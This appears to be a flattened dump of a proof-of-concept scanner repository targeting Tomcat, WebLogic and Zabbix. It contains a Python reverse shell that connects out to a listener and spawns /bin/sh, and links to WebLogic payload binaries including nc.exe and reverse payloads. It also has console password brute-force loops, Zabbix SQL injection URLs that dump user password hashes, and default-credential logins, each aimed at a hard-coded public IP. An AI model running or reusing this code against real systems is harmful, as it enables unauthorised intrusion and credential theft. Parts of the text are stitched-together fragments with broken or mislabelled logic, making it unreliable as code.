    Returns True exactly when the probe response body ``context`` contains
    the literal banner text ``'Apache Tomcat'``. The other parameters are
    accepted only for interface parity with the sibling ``rules`` functions
    and are ignored.
    """
    banner = 'Apache Tomcat'
    return banner in context
    def parse_output(self, result):
        """Default output hook of the T base class.

        The incoming ``result`` is not inspected; a fresh negative result
        dict (``{'result': False}``) is returned unconditionally.
        """
        negative = {'result': False}
        return negative
for flag in flag_list: 65 | if flag in res_html: 66 | 67 | info = '%s Tomcat Weak password %s:%s'%(login_url,user,password) 68 | 69 | 70 | 71 | result['result']=True 72 | result['VerifyInfo'] = {} 73 | result['VerifyInfo']['type']='Tomcat Weak password' 74 | result['VerifyInfo']['URL'] =target_url 75 | result['VerifyInfo']['payload']=login_url 76 | result['VerifyInfo']['result'] =info 77 | return result 78 | return result 79 | return result 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | if __name__ == '__main__': 89 | print P().verify(ip='113.105.74.144',port='80') -------------------------------------------------------------------------------- /middileware/weblogic/__init__.py: -------------------------------------------------------------------------------- 1 | KEYWORDS = ['weblogic', ] 2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 3 | if 'Hypertext Transfer Protocol' in context or 'console/css/login.css|Login_GC_LoginPage_Bg.gif' in context or 'weblogic' in hackinfo or 'weblogic' in keywords or 'weblogic' in productname.get('productname',''): 4 | 5 | 6 | return True 7 | 8 | else: 9 | 10 | return False -------------------------------------------------------------------------------- /middileware/weblogic/collections_3.2.0.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/collections_3.2.0.jar -------------------------------------------------------------------------------- /middileware/weblogic/javax.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/javax.jar -------------------------------------------------------------------------------- /middileware/weblogic/payload_bin/inst.jar: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/inst.jar -------------------------------------------------------------------------------- /middileware/weblogic/payload_bin/nc.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/nc.exe -------------------------------------------------------------------------------- /middileware/weblogic/payload_bin/payload_Linux_delete.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/payload_Linux_delete.bin -------------------------------------------------------------------------------- /middileware/weblogic/payload_bin/payload_Linux_inst.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/payload_Linux_inst.bin -------------------------------------------------------------------------------- /middileware/weblogic/payload_bin/payload_Linux_reverse.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/payload_Linux_reverse.bin -------------------------------------------------------------------------------- /middileware/weblogic/payload_bin/payload_Linux_uninst.bin: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/payload_Linux_uninst.bin -------------------------------------------------------------------------------- /middileware/weblogic/payload_bin/payload_Linux_upload_inst.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/payload_Linux_upload_inst.bin -------------------------------------------------------------------------------- /middileware/weblogic/payload_bin/payload_Linux_upload_reverse.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/payload_Linux_upload_reverse.bin -------------------------------------------------------------------------------- /middileware/weblogic/payload_bin/payload_Linux_upload_uninst.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/payload_Linux_upload_uninst.bin -------------------------------------------------------------------------------- /middileware/weblogic/payload_bin/payload_Windows_delete.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/payload_Windows_delete.bin -------------------------------------------------------------------------------- /middileware/weblogic/payload_bin/payload_Windows_inst.bin: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/payload_Windows_inst.bin -------------------------------------------------------------------------------- /middileware/weblogic/payload_bin/payload_Windows_reverse.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/payload_Windows_reverse.bin -------------------------------------------------------------------------------- /middileware/weblogic/payload_bin/payload_Windows_uninst.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/payload_Windows_uninst.bin -------------------------------------------------------------------------------- /middileware/weblogic/payload_bin/payload_Windows_upload_inst.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/payload_Windows_upload_inst.bin -------------------------------------------------------------------------------- /middileware/weblogic/payload_bin/payload_Windows_upload_reverse.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/payload_Windows_upload_reverse.bin -------------------------------------------------------------------------------- /middileware/weblogic/payload_bin/payload_Windows_upload_uninst.bin: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/payload_Windows_upload_uninst.bin -------------------------------------------------------------------------------- /middileware/weblogic/payload_bin/reverse.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/reverse.jar -------------------------------------------------------------------------------- /middileware/weblogic/payload_bin/reverse_shell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import socket,subprocess,os; 3 | 4 | LHOST = '192.168.56.1' 5 | LPORT = 8080 6 | 7 | def main(): 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); 9 | s.connect((LHOST,LPORT)); 10 | os.dup2(s.fileno(),0); 11 | os.dup2(s.fileno(),1); 12 | os.dup2(s.fileno(),2); 13 | p=subprocess.call(["/bin/sh","-i"]); 14 | 15 | if __name__ == '__main__': 16 | main() 17 | -------------------------------------------------------------------------------- /middileware/weblogic/payload_bin/uninst.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/uninst.jar -------------------------------------------------------------------------------- /middileware/weblogic/shellApp.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/shellApp.jar -------------------------------------------------------------------------------- /middileware/weblogic/t.py: -------------------------------------------------------------------------------- 1 | 
class T(object):
    """Base class that every PoC module subclasses as ``P``.

    It owns the shared result/keyword/version attributes and supplies
    no-op default implementations of the plugin hooks. Subclasses
    override ``verify`` (and sometimes ``attack``); the defaults below
    always report "nothing found".
    """

    def __init__(self):
        # Per-instance state shared by all plugins.
        self.result = dict(type=None, version=None)
        self.keywords = list()
        self.versions = list()

    def match_rule(self, head='', context='', ip='', port='', productname={}, keywords='', hackinfo='', **kw):
        """Decide whether this plugin applies to the probed host.

        Args:
            head: response headers of the probe request
            context: response body (HTML) of the probe request
            ip: target IP address
            port: target port
            productname: product/component information for the request
                (the mutable default is never modified here)
            keywords: currently known keyword components
            hackinfo: spare field
            **kw: extra keyword arguments, ignored

        Returns:
            Always True in the base class.
        """
        return True

    def verify(self, head='', context='', ip='', port='', productname={}, keywords='', hackinfo=''):
        """Default verification hook; reports no finding."""
        return self._negative()

    def attack(self, head='', context='', ip='', port='', productname={}, keywords='', hackinfo=''):
        """Default attack hook; reports no finding."""
        return self._negative()

    def parse_output(self, result):
        """Default output hook; the argument is ignored and a negative result returned."""
        return self._negative()

    @staticmethod
    def _negative():
        """Build the result dict that means "not vulnerable"."""
        return {'result': False}
Home','/console/console.portal','console/jsp/common/warnuserlockheld.jsp','/console/actions/common/'] 23 | user_list=['weblogic'] 24 | pass_list=['weblogic','password','Weblogic1','weblogic10','weblogic10g','weblogic11','weblogic11g','weblogic12','weblogic12g','weblogic13','weblogic13g','weblogic123','123456','12345678','123456789','admin123','admin888','admin1','administrator','8888888','123123','admin','manager','root'] 25 | try: 26 | res = urllib2.urlopen(target_url+"/console/login/LoginForm.jsp") 27 | cookies = res.headers['Set-Cookie'] 28 | except Exception,e: 29 | return result 30 | finally: 31 | if res is not None: 32 | res.close() 33 | del res 34 | for user in user_list: 35 | for password in pass_list: 36 | try: 37 | PostStr='j_username=%s&j_password=%s&j_character_encoding=UTF-8'%(user,password) 38 | request = urllib2.Request(target_url+'/console/j_security_check',PostStr) 39 | request.add_header("Cookie",cookies) 40 | res = urllib2.urlopen(request,timeout=timeout) 41 | res_html = res.read() 42 | except urllib2.HTTPError,e: 43 | return result 44 | except urllib2.URLError,e: 45 | error_i+=1 46 | if error_i >= 3: 47 | return result 48 | continue 49 | finally: 50 | if res is not None: 51 | res.close() 52 | del res 53 | for flag in flag_list: 54 | if flag in res_html: 55 | info = '%s/console Weblogic Weak password %s:%s'%(target_url,user,password) 56 | result['result']=True 57 | result['VerifyInfo'] = {} 58 | result['VerifyInfo']['type']='console Weblogic Weak password' 59 | result['VerifyInfo']['URL'] =target_url 60 | result['VerifyInfo']['payload']=target_url+"/console/login/LoginForm.jsp" 61 | result['VerifyInfo']['result'] =info 62 | return result 63 | return result 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | if __name__ == '__main__': 72 | print P().verify(ip='125.69.90.234',port='7001') -------------------------------------------------------------------------------- /middileware/zabbix/__init__.py: 
--------------------------------------------------------------------------------
# Per-directory dispatch data: the keyword list for this component and a
# predicate deciding whether the zabbix checks apply to a target.
KEYWORDS = ['zabbix', ]
def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
    """Return True when the case-sensitive substring 'zabbix' occurs in hackinfo or in context (the response body)."""
    if 'zabbix' in hackinfo or 'zabbix' in context:
        return True
    else:

        return False
--------------------------------------------------------------------------------
/middileware/zabbix/t.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# encoding: utf-8


class T(object):
    """Base class for the check modules in this collection.

    The per-component modules subclass this as P, call T.__init__ and
    override verify()/attack().  The base implementations below are no-ops
    that report result=False, so an unimplemented hook never counts as a hit.
    """
    def __init__(self):

        # Both keys stay None here; subclasses may fill them in.
        self.result = {
            'type': None,
            'version': None,
        }
        self.keywords = []
        self.versions = []
    def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
        ##
        #head         response headers returned by the target
        #context      response body (HTML) returned by the target
        #ip           target ip
        #port         target port
        #productname  component/product identified for the target
        #keywords     keyword-identified components known so far
        #hackinfo     spare field
        #
        # The base rule accepts every target; subclasses may narrow it.




        return True

    def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
        """Default check: report no finding (result=False)."""
        result = {}
        result['result']=False
        return result
    def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
        """Default attack hook: does nothing and reports result=False."""
        result = {}
        result['result']=False
        return result
    def parse_output(self, result):
        """Default output parser: ignores its argument and reports result=False."""
        result = {}
        result['result']=False
        return result
--------------------------------------------------------------------------------
/middileware/zabbix/zabbix_sqlhack.py:
--------------------------------------------------------------------------------
#coding:utf-8
# Python 2 module (print statement, urllib2).
import urllib2


from t import T




class P(T):
    """Zabbix httpmon.php error-based SQL injection check."""
    def __init__(self):
        T.__init__(self)
    def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
        """Probe httpmon.php for the error-based SQL injection in the applications parameter.

        Requests vul_url at the site root first and, if the marker is absent,
        again under /zabbix/ (that second URL is also printed to stdout).  The
        check is positive when the response body echoes the injected fragment
        'from zabbix.users LIMIT 0,1),floor(rand(0)*2))x from
        information_schema.tables'; the root-path hit stores a short info
        string in VerifyInfo['result'], the /zabbix/ hit stores the whole
        response body.  Returns {'result': False} otherwise or when the second
        request fails.

        Defender note: the probe carries 'information_schema' and
        'zabbix.users' in clear text in the query string, so a web-log search
        or WAF rule on httpmon.php?applications= with SQL keywords detects it;
        the affected Zabbix release range is not recorded in this file.
        """
        timeout=3
        target_url = 'http://'+ip+':'+port
        result = {}
        res=None

        result['result']=False

        res_html=None
        vul_url = target_url + "/httpmon.php?applications=2%20and%20(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(alias,0x7e,passwd,0x7e)%20as%20char),0x7e))%20from%20zabbix.users%20LIMIT%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)"
        try:
            res=urllib2.urlopen(vul_url,timeout=timeout)
            res_html = res.read()
        except:
            # Bare except: any failure (timeout included) becomes an empty
            # body, which falls through to the /zabbix/ attempt below.
            res_html=''
        finally:
            if res is not None:
                res.close()

        if "from zabbix.users LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables" in res_html:
            info = vul_url + " zabbix"
            result['result']=True
            result['VerifyInfo'] = {}
            result['VerifyInfo']['type']='zabbix SQL Vul'
            result['VerifyInfo']['URL'] =target_url
            result['VerifyInfo']['payload']=vul_url
            result['VerifyInfo']['result'] =info
            return result
        else:
            # Same probe under the /zabbix/ prefix.
            vul_url = target_url + "/zabbix/httpmon.php?applications=2%20and%20(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(alias,0x7e,passwd,0x7e)%20as%20char),0x7e))%20from%20zabbix.users%20LIMIT%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)"
            try:
                print vul_url
                res=urllib2.urlopen(vul_url,timeout=timeout)
                res_html = res.read()

            except:
                return result
            finally:
                if res is not None:
                    res.close()
                    del res

            if 'from zabbix.users LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables' in res_html:
                info = vul_url + " zabbix"
                result['result']=True
                result['VerifyInfo'] = {}
                result['VerifyInfo']['type']='zabbix SQL Vul'
                result['VerifyInfo']['URL'] =target_url
                result['VerifyInfo']['payload']=vul_url
                # Unlike the root-path branch, the full response body is stored here.
                result['VerifyInfo']['result'] =res_html
                return result
        return result





if __name__ == '__main__':
    print P().verify(ip='124.202.152.197',port='80')
--------------------------------------------------------------------------------
/middileware/zabbix/zabbix_sqli_v2-3.03.py:
--------------------------------------------------------------------------------
#coding:utf-8
# Python 2 module (print statement, urllib2).
import urllib2


from t import T




class P(T):
    """Zabbix jsrpc.php SQL injection check for the release range in self.version."""
    def __init__(self):
        T.__init__(self)
        # Release range this check targets, appended to the info string on a hit.
        self.version='2.2.x,3.0.0-3.0.3'

        self.type = 'sqli'
    def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
        """Probe jsrpc.php for the updatexml()-based SQL injection in profileIdx2.

        The response body is searched for 'ed733b8d10be225eceba344d533586'
        (presumably the truncated md5(0x11) value from the payload, surfaced
        through the updatexml() error); on a hit result=True with VerifyInfo
        (type, URL, payload, result, level='hole').  If the first request
        fails or the marker is absent, the identical URL is requested once
        more (and printed to stdout); that retry stores the full response body
        in VerifyInfo['result'] instead of the info string.  Returns
        {'result': False} when the retry also misses or fails.

        Defender note: 'updatexml(' in a jsrpc.php query string and the marker
        value are straightforward web-log/WAF signatures; upgrading past the
        listed releases is the fix.
        """
        timeout=3
        target_url = 'http://'+ip+':'+port
        result = {}
        res=None
        payload="/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17"
        result['result']=False
        res_html=None
        vul_url = target_url + payload
        try:
            res=urllib2.urlopen(vul_url,timeout=timeout)
            res_html = res.read()
        except:
            # Bare except: any failure becomes an empty body and the retry
            # branch below runs.
            res_html=''
        finally:
            if res is not None:
                res.close()

        if "ed733b8d10be225eceba344d533586" in res_html:
            info = vul_url + " zabbix "+self.version
            result['result']=True
            result['VerifyInfo'] = {}
            result['VerifyInfo']['type']='zabbix SQL Vul'
            result['VerifyInfo']['URL'] =target_url
            result['VerifyInfo']['payload']=vul_url
            result['VerifyInfo']['result'] =info
            result['VerifyInfo']['level'] = 'hole'
            return result
        else:
            # Same payload as above, so this is a plain retry of the same URL.
            vul_url = target_url + payload
            try:
                print vul_url
                res=urllib2.urlopen(vul_url,timeout=timeout)
                res_html = res.read()

            except:
                return result
            finally:
                if res is not None:
                    res.close()
                    del res

            if 'ed733b8d10be225eceba344d533586' in res_html:
                info = vul_url + " zabbix "+self.version
                result['result']=True
                result['VerifyInfo'] = {}
                result['VerifyInfo']['type']='zabbix SQL Vul'
                result['VerifyInfo']['URL'] =target_url
                result['VerifyInfo']['payload']=vul_url
                # Unlike the first branch, the full response body is stored here.
                result['VerifyInfo']['result'] =res_html
                result['VerifyInfo']['level'] = 'hole'
                return result
        return result





if __name__ == '__main__':
    print P().verify(ip='103.17.42.170',port='80')
--------------------------------------------------------------------------------
/middileware/zabbix/zabbix_weakpass.py:
--------------------------------------------------------------------------------
#coding:utf-8
# Python 2 module (print statement, `except X, e` syntax); needs the
# third-party requests and bs4 packages.

import requests
from bs4 import BeautifulSoup
import base64,re  # neither base64 nor re is used in this file
from t import T
def _get_static_post_attr(page_content):
    """
    Collect the name/value pairs of every <input> in page_content that has
    both attributes and return them as a dict; verify() uses it as the base of
    its login POST body.
    """
    _dict = {}
    soup = BeautifulSoup(page_content, "html.parser")
    for each in soup.find_all('input'):
        if 'value' in each.attrs and 'name' in each.attrs:
            _dict[each['name']] = each['value']
    return _dict
class P(T):
    """Zabbix frontend default-credential (Admin:zabbix) check."""
    def __init__(self):
        T.__init__(self)
    def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
        """Try the default Admin:zabbix credential against /index.php.

        Fetches target_url with a browser User-Agent, copies every named
        <input> value from that page into the POST body, sets name/password,
        and posts to /index.php with a Referer header.  The response body is
        printed to stdout.  A response containing 'chkbxRange.init();' and
        none of the blacklist entries is reported as result=True with
        VerifyInfo; any exception is printed and swallowed, and result=False
        is returned in every other case.  The response and session are closed
        in finally.

        NOTE(review): VerifyInfo['type'] is 'Tomcat Weak password' although
        this is the zabbix check, so consumers that triage findings by that
        string will mis-file it.  Defender note: the mitigation is changing the
        built-in Admin account's password at install time and restricting
        access to the frontend.
        """
        timeout=10  # unused; the calls below pass the literal 10
        target_url = 'http://'+ip+':'+port
        result = {}
        result['result']=False
        r=None
        s = None
        h1 = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
        }

        h2 = {
            'Referer': target_url.strip('\n'),
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
        }

        # Substrings whose presence in the post-login page vetoes a hit.
        blacklist = [
            'incorrect',
            '',

        ]
        try:
            s = requests.session()
            c = s.get(target_url, timeout=10, headers=h1)
            dic = _get_static_post_attr(c.content)
            dic['name'] = 'Admin'
            dic['password'] = 'zabbix'
            # print dic
            r = s.post(target_url + '/index.php', data=dic, headers=h2, timeout=10)
            print r.content
            if 'chkbxRange.init();' in r.content:
                for each in blacklist:
                    if each in r.content:
                        return result
                else:
                    # for/else: reached only when no blacklist entry matched.
                    info = ' zabbix Weak password Admin:zabbix'

                    result['result'] = True
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['type'] = 'Tomcat Weak password'
                    result['VerifyInfo']['URL'] = target_url
                    result['VerifyInfo']['result'] = info
        except Exception, e:
            # Errors are printed and swallowed; the caller only sees result=False.
            print e
        finally:
            if r is not None:
                r.close()
            if s is not None:
                s.close()
        return result










if __name__ == '__main__':
    print P().verify(ip='180.235.64.209',port='8080')
--------------------------------------------------------------------------------